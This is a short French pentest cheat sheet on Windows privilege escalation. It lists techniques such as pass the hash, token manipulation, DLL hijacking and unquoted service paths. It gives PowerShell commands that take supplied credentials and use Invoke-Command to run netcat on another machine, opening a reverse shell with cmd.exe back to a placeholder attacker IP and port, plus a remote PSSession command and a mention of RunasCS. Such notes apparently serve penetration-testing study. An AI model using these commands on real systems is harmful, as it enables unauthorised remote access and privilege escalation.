Elévation de privilège
Méthodologie
- Patchs absents
- Identifiants stockés (Navigateurs, DPAPI, etc.)
- Pass the hash
- GPP
- Manipulation de token
- Secondary Logon
- Chemin de service non quoté
- Permission de registre non sécurisé
- Intel SYSRET
- Always Install Elevated
- Injection de DLL
- Hijacking de DLL
- Weak/Insecure service permission
- Insecure file/folder permission
- Groupe par défault vulnérables (The Hacker recipes)
Win-RM local
Monter un reverse shell sur une autre session:
$securePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential '<USERNAME>', $securePassword
Invoke-command -ComputerName <COMPUTER NAME> -Credential $credential -ScripBlock { <PATH TO NC.exe> <ATTACKER IP> <ATTACKER PORT> -e cmd.exe }
Obtenir un shell sur une autre session:
$securePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential '<USERNAME>', $securePassword
enter-pssession -Computer <COMPUTER NAME> -Credential $credential
RunasCS
RunasCS permet d’obtenir les fonctionnalités de la commande native runas.exe mais tout en contournant quelques limitations.
Ressources :